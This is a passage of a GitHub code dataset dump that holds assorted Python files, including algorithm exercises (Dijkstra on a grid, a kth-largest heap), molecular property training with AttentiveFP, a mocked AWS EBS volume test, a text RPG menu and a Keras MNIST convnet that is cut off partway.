occurrence_counts = dict(Counter(x for labels in all_label for x in labels))\n return occurrence_counts\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_json')\n parser.add_argument('--test_json')\n parser.add_argument('--save')\n args = parser.parse_args()\n\n train_counts = get_label_dictionary(args.train_json)\n test_counts = get_label_dictionary(args.test_json)\n\n train = []\n test = []\n for k in sorted(train_counts.keys() & test_counts.keys()):\n train.append(train_counts[k])\n test.append(test_counts[k])\n\n train = [x / len(train_counts.keys()) for x in train]\n test = [x / len(test_counts.keys()) for x in test]\n\n mutual_score = mutual_info_score(train, test)\n print('mutual score:', mutual_score)\n\n def KL(a, b):\n a = np.asarray(a, dtype=np.float)\n b = np.asarray(b, dtype=np.float)\n\n return np.sum(np.where(a != 0, a * np.log(a / b), 0))\n\n KL = KL(train, test)\n print('KL distance: ', KL)\n # plots\n # less_than_100 = []\n # between_100_and_500 = []\n # between_500_and_1000 = []\n # between_1000_and_5000 = []\n # grater_than_5000 = []\n # for key in occurrence_counts.keys():\n # if occurrence_counts.get(key) < 100:\n # less_than_100.append(key)\n # elif 100 <= occurrence_counts.get(key) < 500:\n # between_100_and_500.append(key)\n # elif 500 <= occurrence_counts.get(key) < 1000:\n # between_500_and_1000.append(key)\n # elif 1000 <= occurrence_counts.get(key) < 5000:\n # between_1000_and_5000.append(key)\n # elif occurrence_counts.get(key) >= 5000:\n # grater_than_5000.append(key)\n #\n # mesh_demographic = {'less_than_100': len(less_than_100),\n # 'between_100_and_500': len(between_100_and_500),\n # 'between_500_and_1000': len(between_500_and_1000),\n # 'between_1000_and_5000': len(between_1000_and_5000),\n # 'grater_than_5000': len(grater_than_5000)\n # }\n # mesh_range = list(mesh_demographic.keys())\n # numbers = list(mesh_demographic.values())\n #\n # fig = plt.figure(figsize=(5, 20))\n #\n # # creating the bar plot\n # plt.bar(mesh_range, numbers, color='maroon', width=0.4)\n #\n # plt.xlabel(\"MeSH range\")\n # plt.ylabel(\"Number of MeSH Terms in Each Range\")\n # plt.title(\"MeSH Demographics\")\n # plt.savefig(args.save, dpi=400)\n # plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"xdwang0726/KenMeSH","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"17454776478","text":"'''\n<문제>\n당신은 화성 탐사 기계를 개발하는 프로그래머다. \n그런데 화성은 에너지 공급원을 찾기가 힘들다. \n그래서 에너지를 효율적으로 사용하고자 화성 탐사 기계가 출발 지점에서 목표 지점까지 이동할 때 항상 최적의 경로를 찾도록 개발해야 한다.\n\n화성 탐사 기계가 존재하는 공간은 N x N 크기의 2차원 공간이며, 각각의 칸을 지나기 위한 비용(에너지 소모량)이 존재한다. \n가장 왼쪽 위 칸인 [0][0] 위치에서 가장 오른쪽 아래 칸인 [N - 1][N - 1] 위치로 이동하는 최소 비용을 출력하는 프로그램을 작성하라. \n화성 탐사 기계는 특정한 위치에서 상하좌우 인접한 곳으로 1칸씩 이동할 수 있다.\n\n<입력 조건>\n첫째 줄에 테스트 케이스의 수 T(1 <= T <= 10)가 주어진다.\n매 테스트 케이스의 첫째 줄에는 탐사 공간의 크기를 의미하는 정수 N이 주어진다.\n2 <= N <= 125\n이어서 N개의 줄에 걸쳐 각 칸의 비용이 주어지며 공백으로 구분한다.\n0 <= 각 칸의 비용 <= 9\n<출력 조건>\n각 테스트 케이스마다 [0][0]의 위치에서 [N - 1][N - 1]의 위치로 이동하는 최소 비용을 한 줄에 하나씩 출력한다.\n<테스트 케이스> \n입력 예시\n\n3 \n3 \n5 5 4 \n3 9 1 \n3 2 7 \n5 \n3 7 2 0 1 \n2 8 0 9 1 \n1 2 1 8 1 \n9 8 9 2 0 \n3 6 5 1 5 \n7 \n9 0 5 1 1 5 3 \n4 1 2 1 6 5 3 \n0 7 6 1 6 8 5 \n1 1 7 8 3 2 3 \n9 4 0 7 6 4 1 \n5 8 3 2 4 8 3 \n7 4 8 4 8 3 4\n출력 예시\n\n20\n19\n36\n'''\n#공부한 코드 (https://github.com/ndb796/python-for-coding-test/blob/master/17/3.py)\nimport heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9) # 무한을 의미하는 값으로 10억을 설정\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# 전체 테스트 케이스(Test Case)만큼 반복\nfor tc in range(int(input())):\n # 노드의 개수를 입력받기\n n = int(input())\n\n # 전체 맵 정보를 입력받기\n graph = []\n for i in range(n):\n graph.append(list(map(int, input().split())))\n\n # 최단 거리 테이블을 모두 무한으로 초기화\n distance = [[INF] * n for _ in range(n)]\n\n x, y = 0, 0 # 시작 위치는 (0, 0)\n # 시작 노드로 가기 위한 비용은 (0, 0) 위치의 값으로 설정하여, 큐에 삽입\n q = [(graph[x][y], x, y)]\n distance[x][y] = graph[x][y]\n\n # 다익스트라 알고리즘을 수행\n while q:\n # 가장 최단 거리가 짧은 노드에 대한 정보를 꺼내기\n dist, x, y = heapq.heappop(q)\n # 현재 노드가 이미 처리된 적이 있는 노드라면 무시\n if distance[x][y] < dist:\n continue\n # 현재 노드와 연결된 다른 인접한 노드들을 확인\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n # 맵의 범위를 벗어나는 경우 무시\n if nx < 0 or nx >= n or ny < 0 or ny >= n:\n continue\n cost = dist + graph[nx][ny]\n # 현재 노드를 거쳐서, 다른 노드로 이동하는 거리가 더 짧은 경우\n if cost < distance[nx][ny]:\n distance[nx][ny] = cost\n heapq.heappush(q, (cost, nx, ny))\n\n print(distance[n - 1][n - 1])\n\n\n#실패한 코드\n#bfs 로 풀면 그리디하게 풀어야하는데 결과가 항상 최단 거리라고 장담할 수 없음\n# from collections import deque\n# import sys\n# input = sys.stdin.readline\n# dx = [-1, 0, 1, 0]\n# dy = [0, 1, 0, -1]\n# for test in range(int(input())):\n# # 노드의 개수를 입력받기\n# n = int(input())\n\n# # 전체 맵 정보를 입력받기\n# graph = []\n \n# for i in range(n):\n# graph.append(list(map(int, input().split())))\n# dist = [[0]*n for i in range(n)]\n# print(graph)\n# print(dist)\n# q = deque([[0,0]])\n# visited=[[0,0]]]\n# while q:\n# now = q.popleft()\n# now_x,now_y = now[0],now[1]\n# for i in range(4):\n# pos_x = now_x + dx[i]\n# pos_y = now_y + dy[i]\n# if 0<=pos_x<n and 0<= pos_y <n and [pos_x,pos_y] not in visited:\n \n","repo_name":"apple3285/Programing_training","sub_path":"17-최단_경로/화성_탐성.py","file_name":"화성_탐성.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72070919207","text":"# 给定整数数组 nums 和整数 k,请返回数组中第 k 个最大的元素。 \n# \n# 请注意,你需要找的是数组排序后的第 k 个最大的元素,而不是第 k 个不同的元素。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入: [3,2,1,5,6,4] 和 k = 2\n# 输出: 5\n# \n# \n# 示例 2: \n# \n# \n# 输入: [3,2,3,1,2,4,5,5,6] 和 k = 4\n# 输出: 4 \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= k <= nums.length <= 10⁴ \n# -10⁴ <= nums[i] <= 10⁴ \n# \n# \n# \n# \n# 注意:本题与主站 215 题相同: https://leetcode-cn.com/problems/kth-largest-element-in-an-\n# array/ \n# Related Topics 数组 分治 快速选择 排序 堆(优先队列) 👍 23 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nfrom typing import List\nimport heapq\n\n\nclass Solution:\n def findKthLargest(self, nums: List[int], k: int) -> int:\n \"\"\"\n 方法1:最小堆。\n :param nums:\n :param k:\n :return:\n \"\"\"\n min_heap = []\n for num in nums:\n if len(min_heap) < k:\n heapq.heappush(min_heap, num)\n else:\n if num < min_heap[0]:\n continue\n else:\n heapq.heappop(min_heap)\n heapq.heappush(min_heap, num)\n return min_heap[0]\n\nclass Good:\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n def __lt__(self, other):\n if self.price < other.price:\n return True\n elif self.price == other.price:\n return self.name < other.name\n\n\nclass DataBase:\n def __init__(self):\n self.data = []\n\n def add(self, good):\n heapq.heappush(self.data, good)\n # self.data.append((price, name))\n # self.data.sort()\n # print(self.data)\n\n def get(self, idx):\n return self.data[idx].name\n\ndef getitem(entries):\n res = []\n db = DataBase()\n idx =0\n for entry in entries:\n if entry[0] == 'INSERT':\n name, price = entry[1], entry[2]\n good = Good(name, int(price))\n db.add(good)\n elif entry[0] == 'VIEW':\n name = db.get(idx)\n idx += 1\n res.append(name)\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n entries = [['INSERT', 'fries', 4],\n ['INSERT', 'doda', 2],\n ['VIEW'],\n ['VIEW'],\n ['INSERT', 'humb', 5],\n ['VIEW'],\n ['INSERT', 'nuggets', 4],\n ['INSERT', 'cookie', 1],\n ['VIEW'],\n ['VIEW']]\n\n result = getitem(entries)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[剑指 Offer II 076]数组中的第 k 大的数字.py","file_name":"[剑指 Offer II 076]数组中的第 k 大的数字.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15837298271","text":"#filename: chap9_ex4_index_raise.py\n#function: raise exception\n\nMath_Listing=[86,90,78,92,100]\nMath_student_name=[\"Wang Hai\",\"Tsai Cher\",\"Cheng gin-lin\",\"Chang chou sang\",\"Tsai ching-yuan\"]\n\ndef chk_score(data,indexing):\n if indexing >len(data):\n print(\"\\n****Raise Occurs and will raise IndexError\")\n raise IndexError\n else:\n return data[indexing]\n \ntry:\n print(\"The Math score is:\",Math_Listing)\n index=int(input(\"Input the index you want:\"))\n score=chk_score(Math_Listing,index)\n who=Math_student_name[index]\n \nexcept IndexError as e:\n print(\"\\nexception IndexError after calling subprogram chk_score\\n\",type(e))\n raise\nelse:\n print(\"score=\",score, \"\\tStudent:\",who)\nfinally:\n print(\"finally statement\")\n","repo_name":"Scott-S-Lin/Python_Programming_ChineseBook","sub_path":"ch9/exam9-3.py","file_name":"exam9-3.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41627815878","text":"#User function Template for python3\n\ndef reverseWord(s):\n #your code here\n s=[i for i in s]\n def reverse(i,j,s):\n if i>j:\n return\n s[i],s[j]=s[j],s[i]\n reverse(i+1,j-1,s)\n reverse(0,len(s)-1,s)\n return(\"\".join(s))\n \n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == \"__main__\":\n t = int(input())\n while(t>0):\n s = input()\n print(reverseWord(s))\n t = t-1\n\n# } Driver Code Ends","repo_name":"akashprap/Coding-Problems","sub_path":"Basic/Reverse a String/reverse-a-string.py","file_name":"reverse-a-string.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23289668929","text":"import os\nimport time\nimport torch\nimport torch.optim as optim\nimport numpy as np\nimport pickle\n\nfrom enum import Enum\nfrom typing import List, Dict\nfrom functools import reduce\nfrom tqdm import tqdm\nfrom rdkit.Chem import MolToSmiles, RemoveAllHs\n\n# from data.geom_qm9.load_qm9 import load_qm9 as load_geom_qm9\nfrom data.qm7.load_qm7 import load_qm7\nfrom data.qm8.load_qm8 import load_qm8\nfrom data.qm9.load_qm9 import load_qm9\nfrom net.baseline.AttentiveFP.AttentiveLayers import Fingerprint\nfrom net.baseline.AttentiveFP.getFeatures import save_smiles_dicts, get_smiles_array\nfrom .config import QM7_CONFIG, QM8_CONFIG\nfrom train.utils.cache_batch import Batch, load_batch_cache, load_encode_mols, batch_cuda_copy\nfrom train.utils.seed import set_seed\nfrom train.utils.loss_functions import multi_mse_loss, multi_mae_loss\nfrom train.utils.save_log import save_log\n\nMODEL_DICT_DIR = 'train/models/AttentiveFP'\n\n\nclass QMDataset(Enum):\n QM7 = 1,\n QM8 = 2,\n\n\ndef train_qm9(special_config: dict = None, dataset=QMDataset.QM7,\n use_cuda=False, max_num=-1, data_name='QM9', seed=0, force_save=False, tag='AttentiveFP-QM9',\n use_tqdm=False):\n # set parameters and seed\n print(f'For {tag}:')\n if dataset == QMDataset.QM7:\n config = QM7_CONFIG.copy()\n else:\n config = QM8_CONFIG.copy()\n if special_config is not None:\n config.update(special_config)\n print('\\t CONFIG:')\n for k, v in config.items():\n print(f'\\t\\t{k}: {v}')\n set_seed(seed, use_cuda=use_cuda)\n np.set_printoptions(suppress=True, precision=3, linewidth=200)\n\n # load dataset\n print('Loading:')\n # mol_list_weight_mol, mol_properties = load_geom_qm9(max_num)\n # mols = [list_weight_mol[0][1] for list_weight_mol in mol_list_weight_mol]\n if dataset == QMDataset.QM7:\n mols, mol_properties = load_qm7(max_num)\n mols = [RemoveAllHs(mol) for mol in mols]\n not_single_mask = [len(mol.GetAtoms()) > 1 for mol in mols]\n mols = [mols[i] for i in range(len(mols)) if not_single_mask[i]]\n mol_properties = mol_properties[not_single_mask, :]\n mols_info = load_encode_mols(mols, name=data_name, force_save=force_save)\n else:\n mols, mol_properties = load_qm8(max_num)\n mols = [RemoveAllHs(mol) for mol in mols]\n not_single_mask = [len(mol.GetAtoms()) > 1 for mol in mols]\n mols = [mols[i] for i in range(len(mols)) if not_single_mask[i]]\n mol_properties = mol_properties[not_single_mask, :]\n mols_info = load_encode_mols(mols, name=data_name, force_save=force_save)\n\n smiles_list = [MolToSmiles(m) for m in mols]\n feature_filename = f'train/AttentiveFP/{data_name}.pickle'\n filename = f'train/AttentiveFP/{data_name}'\n if os.path.isfile(feature_filename):\n feature_dicts = pickle.load(open(feature_filename, \"rb\"))\n else:\n feature_dicts = save_smiles_dicts(smiles_list, filename)\n\n # normalize properties and cache batches\n mean_p = np.mean(mol_properties, axis=0)\n stddev_p = np.std((mol_properties - mean_p).tolist(), axis=0, ddof=0)\n weights = torch.tensor(stddev_p ** 2, dtype=torch.float32) * 500\n if use_cuda:\n weights = weights.cuda()\n norm_p = (mol_properties - mean_p) / stddev_p\n print(f'\\tmean: {mean_p}')\n print(f'\\tstd: {stddev_p}')\n # print(f'\\tmad: {mad_p}')\n if dataset == QMDataset.QM8:\n print(f'\\tweights: {weights.cpu().numpy()}')\n print('Caching Batches...')\n try:\n batch_cache = load_batch_cache(data_name, mols, mols_info, norm_p, batch_size=config['BATCH'],\n contains_ground_truth_conf=False, need_mask_matrices=False,\n use_cuda=use_cuda, use_tqdm=use_tqdm, force_save=force_save)\n except EOFError:\n batch_cache = load_batch_cache(data_name, mols, mols_info, norm_p, batch_size=config['BATCH'],\n contains_ground_truth_conf=False, need_mask_matrices=False,\n use_cuda=use_cuda, use_tqdm=use_tqdm, force_save=True)\n\n # build model\n print('Building Models...')\n model = Fingerprint(\n radius=config['RADIUS'],\n T=config['T'],\n input_feature_dim=39,\n input_bond_dim=10,\n fingerprint_dim=config['DIM'],\n output_units_num=mol_properties.shape[1],\n p_dropout=config['DROPOUT']\n )\n if use_cuda:\n model.cuda()\n\n # initialize optimization\n parameters = list(model.parameters())\n optimizer = optim.Adam(params=parameters, lr=config['LR'], weight_decay=config['DECAY'])\n scheduler = optim.lr_scheduler.StepLR(optimizer=optimizer, step_size=1, gamma=config['GAMMA'])\n print('##### Parameters #####')\n\n param_size = 0\n for name, param in model.named_parameters():\n print(f'\\t\\t{name}: {param.shape}')\n param_size += reduce(lambda x, y: x * y, param.shape)\n print(f'\\tNumber of parameters: {param_size}')\n\n # train\n epoch = 0\n logs: List[Dict[str, float]] = []\n best_epoch = 0\n best_metric = 999\n try:\n if not os.path.exists(MODEL_DICT_DIR):\n os.mkdir(MODEL_DICT_DIR)\n except FileExistsError:\n pass\n\n def train(batches: List[Batch], masks: List[List[int]]):\n model.train()\n optimizer.zero_grad()\n n_batch = len(batches)\n if use_tqdm:\n batches = tqdm(batches, total=n_batch)\n for mask, batch in zip(masks, batches):\n if use_cuda:\n batch = batch_cuda_copy(batch)\n temp_smiles_list = [smiles_list[iii] for iii in mask]\n x_atom, x_bonds, x_atom_index, x_bond_index, x_mask, smiles_to_rdkit_list = get_smiles_array(\n temp_smiles_list, feature_dicts)\n if use_cuda:\n _, pred_p = model.forward(torch.Tensor(x_atom).cuda(), torch.Tensor(x_bonds).cuda(),\n torch.cuda.LongTensor(x_atom_index),\n torch.cuda.LongTensor(x_bond_index), torch.Tensor(x_mask).cuda())\n else:\n _, pred_p = model.forward(torch.Tensor(x_atom), torch.Tensor(x_bonds),\n torch.LongTensor(x_atom_index),\n torch.LongTensor(x_bond_index), torch.Tensor(x_mask))\n if dataset == QMDataset.QM8:\n p_losses = multi_mse_loss(pred_p, batch.properties, explicit=True)\n p_loss = sum(p_losses * weights)\n else:\n p_loss = multi_mse_loss(pred_p, batch.properties)\n loss = p_loss\n loss.backward()\n optimizer.step()\n\n def evaluate(batches: List[Batch], masks: List[List[int]], batch_name: str) -> float:\n model.eval()\n optimizer.zero_grad()\n n_batch = len(batches)\n list_p_loss = []\n list_loss = []\n list_p_multi_mae = []\n list_p_total_mae = []\n if use_tqdm:\n batches = tqdm(batches, total=n_batch)\n for mask, batch in zip(masks, batches):\n if use_cuda:\n batch = batch_cuda_copy(batch)\n temp_smiles_list = [smiles_list[iii] for iii in mask]\n x_atom, x_bonds, x_atom_index, x_bond_index, x_mask, smiles_to_rdkit_list = get_smiles_array(\n temp_smiles_list, feature_dicts)\n if use_cuda:\n _, pred_p = model.forward(torch.Tensor(x_atom).cuda(), torch.Tensor(x_bonds).cuda(),\n torch.cuda.LongTensor(x_atom_index),\n torch.cuda.LongTensor(x_bond_index), torch.Tensor(x_mask).cuda())\n else:\n _, pred_p = model.forward(torch.Tensor(x_atom), torch.Tensor(x_bonds),\n torch.LongTensor(x_atom_index),\n torch.LongTensor(x_bond_index), torch.Tensor(x_mask))\n if dataset == QMDataset.QM8:\n p_losses = multi_mse_loss(pred_p, batch.properties, explicit=True)\n p_loss = sum(p_losses * weights)\n else:\n p_loss = multi_mse_loss(pred_p, batch.properties)\n loss = p_loss\n list_p_loss.append(p_loss.cpu().item())\n list_loss.append(loss.cpu().item())\n\n p_multi_mae = multi_mae_loss(pred_p, batch.properties, explicit=True)\n p_total_mae = p_multi_mae.sum()\n list_p_multi_mae.append(p_multi_mae.cpu().detach().numpy())\n list_p_total_mae.append(p_total_mae.cpu().item())\n\n print(f'\\t\\t\\tP LOSS: {sum(list_p_loss) / n_batch}')\n print(f'\\t\\t\\tTOTAL LOSS: {sum(list_loss) / n_batch}')\n print(f'\\t\\t\\tPROPERTIES MULTI-MAE: {sum(list_p_multi_mae) * stddev_p / n_batch}')\n if dataset == QMDataset.QM8:\n total_mae = np.sum(sum(list_p_multi_mae) * stddev_p / n_batch)\n else:\n total_mae = sum(list_p_total_mae) / n_batch\n print(f'\\t\\t\\tPROPERTIES TOTAL MAE: {total_mae}')\n logs[-1].update({\n f'{batch_name}_p_loss': sum(list_p_loss) / n_batch,\n f'{batch_name}_loss': sum(list_loss) / n_batch,\n f'{batch_name}_p_metric': total_mae,\n f'{batch_name}_multi_p_metric': list(sum(list_p_multi_mae) * stddev_p / n_batch),\n })\n return sum(list_p_total_mae) / n_batch\n\n for _ in range(config['EPOCH']):\n epoch += 1\n t0 = time.time()\n\n logs.append({'epoch': epoch})\n print()\n print(f'##### IN EPOCH {epoch} #####')\n print('\\tCurrent LR: {:.3e}'.format(optimizer.state_dict()['param_groups'][0]['lr']))\n print('\\t\\tTraining:')\n train(batch_cache.train_batches, batch_cache.train_masks)\n print('\\t\\tEvaluating Train:')\n evaluate(batch_cache.train_batches, batch_cache.train_masks, 'train')\n print('\\t\\tEvaluating Validate:')\n m = evaluate(batch_cache.validate_batches, batch_cache.validate_masks, 'validate')\n print('\\t\\tEvaluating Test:')\n evaluate(batch_cache.test_batches, batch_cache.test_masks, 'test')\n scheduler.step(epoch)\n\n t1 = time.time()\n print('\\tProcess Time: {}'.format(int(t1 - t0)))\n logs[-1].update({'process_time': t1 - t0})\n\n if m < best_metric:\n best_metric = m\n best_epoch = epoch\n print(f'\\tSaving Model...')\n torch.save(model.state_dict(), f'{MODEL_DICT_DIR}/{tag}-model.pkl')\n logs[-1].update({'best_epoch': best_epoch})\n save_log(logs,\n directory='QM7' if dataset == QMDataset.QM7\n else 'QM8' if dataset == QMDataset.QM8\n else 'QM9',\n tag=tag)\n","repo_name":"PKUterran/PhysChem","sub_path":"train/AttentiveFP/train_qm9.py","file_name":"train_qm9.py","file_ext":"py","file_size_in_byte":10817,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"294677328","text":"from unittest import TestCase\n\nimport boto3\nfrom moto import mock_ec2\n\nfrom altimeter.aws.resource.ec2.volume import EBSVolumeResourceSpec\nfrom altimeter.aws.scan.aws_accessor import AWSAccessor\nfrom altimeter.aws.scan.settings import ALL_RESOURCE_SPEC_CLASSES\nfrom altimeter.core.graph.links import LinkCollection, ResourceLink, SimpleLink\nfrom altimeter.core.resource.resource import Resource\n\n\nclass TestEBSVolumeResourceSpec(TestCase):\n @mock_ec2\n def test_scan(self):\n account_id = \"123456789012\"\n region_name = \"us-east-1\"\n\n session = boto3.Session()\n\n ec2_client = session.client(\"ec2\", region_name=region_name)\n resp = ec2_client.create_volume(Size=1, AvailabilityZone=\"us-east-1a\")\n create_time = resp[\"CreateTime\"]\n created_volume_id = resp[\"VolumeId\"]\n created_volume_arn = f\"arn:aws:ec2:us-east-1:123456789012:volume/{created_volume_id}\"\n\n scan_accessor = AWSAccessor(session=session, account_id=account_id, region_name=region_name)\n resources = EBSVolumeResourceSpec.scan(\n scan_accessor=scan_accessor,\n all_resource_spec_classes=ALL_RESOURCE_SPEC_CLASSES,\n )\n\n expected_resources = [\n Resource(\n resource_id=created_volume_arn,\n type=\"aws:ec2:volume\",\n link_collection=LinkCollection(\n simple_links=(\n SimpleLink(pred=\"availability_zone\", obj=\"us-east-1a\"),\n SimpleLink(pred=\"create_time\", obj=create_time),\n SimpleLink(pred=\"size\", obj=True),\n SimpleLink(pred=\"state\", obj=\"available\"),\n SimpleLink(pred=\"volume_type\", obj=\"gp2\"),\n SimpleLink(pred=\"encrypted\", obj=False),\n ),\n resource_links=(\n ResourceLink(pred=\"account\", obj=\"arn:aws::::account/123456789012\"),\n ResourceLink(pred=\"region\", obj=\"arn:aws:::123456789012:region/us-east-1\"),\n ),\n ),\n )\n ]\n self.assertEqual(resources, expected_resources)\n","repo_name":"tableau/altimeter","sub_path":"tests/unit/altimeter/aws/resource/ec2/test_volume.py","file_name":"test_volume.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"39631636822","text":"import tensorflow as tf\n\n\nclass PaddedBinaryCrossentropyLoss(tf.keras.losses.Loss):\n def __init__(self, smoothing=0.):\n super(PaddedBinaryCrossentropyLoss, self).__init__()\n self.smoothing = smoothing\n\n def call(self, y_true, y_pred):\n y_true = tf.cast(y_true, dtype='float32')\n weights = tf.cast(tf.not_equal(y_true, 0.), tf.float32)\n y_true = tf.maximum(y_true - 1., 0.)\n y_true = y_true * (1.0 - self.smoothing) + 0.5 * self.smoothing\n bxentropy = tf.keras.backend.binary_crossentropy(y_true, y_pred, from_logits=False)\n\n bxentropy *= weights\n loss = tf.reduce_sum(bxentropy) / (tf.reduce_sum(weights) + 1e-4)\n return loss\n","repo_name":"scott-pu-pennstate/dktt_light","sub_path":"dktt_light/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"28663395918","text":"import random\r\nimport time\r\nimport sys\r\nimport os\r\nimport combat\r\n\r\ndef string(x):\r\n\r\n i = 0\r\n while i < len(x):\r\n for char in x: \r\n print(char, end=\"\") \r\n sys.stdout.flush() \r\n time.sleep(0.02) \r\n i += 1\r\n else:\r\n print(\"\")\r\n\r\ndef CharacterMenu():\r\n\r\n\r\n def Player_Stats():\r\n global PlayerStats\r\n PlayerStats = {\"LEVEL\":combat.User.level,\"EXP\": combat.User.XP,\"HEALTH\": combat.User.health,\"STRENGTH\": combat.User.strength, \"AGILITY\": combat.User.agility, \"LEVEL UP POINTS\": combat.User.LVP}\r\n \r\n string(\"THESE ARE YOUR CHARACTER STATS:\\n\")\r\n \r\n for x in PlayerStats: string(f\"{x}: {PlayerStats[x]}\")\r\n\r\n\r\n def LevelUpPointsMenu():\r\n while combat.User.LVP > 0:\r\n string(\"WHAT STAT WOULD YOU LIKE TO LEVEL UP?:\\n\")\r\n string(f\"[1] HEALTH: {PlayerStats['HEALTH']}\")\r\n string(f\"[2] STRENGTH: {PlayerStats['STRENGTH']}\")\r\n string(f\"[3] AGILITY: {PlayerStats['AGILITY']}\")\r\n string(f\"[4] BACK TO OTHER MENU\")\r\n choice = int(input(\": \"))\r\n\r\n if choice == 1:\r\n combat.User.health += 20\r\n combat.User.LVP -= 1\r\n\r\n string(f\"YOUR HEALTH IS NOW {combat.User.health}\")\r\n \r\n if choice == 2:\r\n combat.User.strength += 1\r\n combat.User.LVP -= 1\r\n\r\n string(f\"YOUR STRENGTH IS NOW {combat.User.strength}\")\r\n \r\n if choice == 3:\r\n combat.User.agility += 1\r\n combat.User.LVP -= 1\r\n string(f\"YOUR AGILITY IS NOW {combat.User.agility}\")\r\n elif choice == 4:\r\n return \r\n else:\r\n string(\"YOU HAVE NO POINTS TO SPEND\")\r\n \r\n def Menu():\r\n\r\n string(\"\\n[1] USE LEVEL POINT\")\r\n string(\"[2] CHECK EXP NEEDED UNTIL NEXT LEVEL UP\")\r\n string(\"[3] CHECK POINTS\")\r\n string(\"[4] BACK\")\r\n choice = input(\":\")\r\n\r\n if choice == \"1\":\r\n os.system(\"cls\")\r\n LevelUpPointsMenu()\r\n os.system('cls')\r\n Player_Stats()\r\n Menu()\r\n elif choice == \"2\":\r\n string(f\"\\nEXP NEEDED TO LEVEL UP: {100*combat.User.level - PlayerStats['EXP']}\\n\")\r\n Menu()\r\n elif choice == \"3\":\r\n string(f\"\\n YOUR SCORE IS {combat.Player_Points} POINTS.\")\r\n Menu()\r\n elif choice == \"4\":\r\n os.system(\"cls\")\r\n return\r\n else:\r\n Menu()\r\n Player_Stats()\r\n Menu()\r\n","repo_name":"JamiePacheco/Text-Based-RPG-","sub_path":"GameMainFile.py/Character.py","file_name":"Character.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74840465446","text":"'''Trains a simple convnet on the MNIST dataset.\r\nGets to 99.25% test accuracy after 12 epochs\r\n(there is still a lot of margin for parameter tuning).\r\n16 seconds per epoch on a GRID K520 GPU.\r\n'''\r\n\r\nfrom __future__ import print_function\r\nimport keras\r\nfrom keras.datasets import mnist\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras import backend as K\r\nimport numpy as np\r\n\r\n\r\n# Set that the color channel value will be first\r\nK.set_image_data_format('channels_first')\r\n\r\n# Set seed\r\nnp.random.seed(0)\r\n\r\n# Load data and target from MNIST data\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\nbatch_size = 128\r\nnum_classes = 10\r\nepochs = 12\r\n\r\n# input image dimensions\r\nimg_rows, img_cols = 28, 28\r\n\r\nif K.image_data_format() == 'channels_first':\r\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\r\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\r\n input_shape = (1, img_rows, img_cols)\r\nelse:\r\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\r\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\r\n input_shape = (img_rows, img_cols, 1)\r\n\r\nx_train = x_train.astype('float32')\r\nx_test = x_test.astype('float32')\r\nx_train /= 255\r\nx_test /= 255\r\nprint('x_train shape:', x_train.shape)\r\nprint(x_train.shape[0], 'train samples')\r\nprint(x_test.shape[0], 'test samples')\r\n\r\n# convert class vectors to binary class matrices\r\ny_train = keras.utils.to_categorical(y_train, num_classes)\r\ny_test = keras.utils.to_categorical(y_test, num_classes)\r\n\r\n# Start neural network\r\nmodel = Sequential()\r\n\r\n# Add convolutional layer with 32 filters, a 3x3 window, and ReLU activation function\r\nmodel.add(Conv2D(32, kernel_size=(3, 3),\r\n activation='relu',\r\n input_shape=input_shape))\r\n\r\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\r\n\r\n# Add max pooling layer with a 2x2 window\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n# Add dropout layer\r\nmodel.add(Dropout(0.25))\r\n\r\n# Add layer to flatten input\r\nmodel.add(Flatten())\r\n\r\n# # Add fully connected layer of 128 units with a ReLU activation function\r\nmodel.add(Dense(128, activation='relu'))\r\n\r\n# Add dropout layer\r\nmodel.add(Dropout(0.5))\r\n\r\n# Add fully connected layer with a softmax activation function\r\nmodel.add(Dense(num_classes, activation='softmax'))\r\n\r\n# Compile neural network\r\nmodel.compile(loss=keras.losses.categorical_crossentropy,\r\n optimizer=keras.optimizers.Adadelta(),\r\n metrics=['accuracy'])\r\n\r\n# Train neural 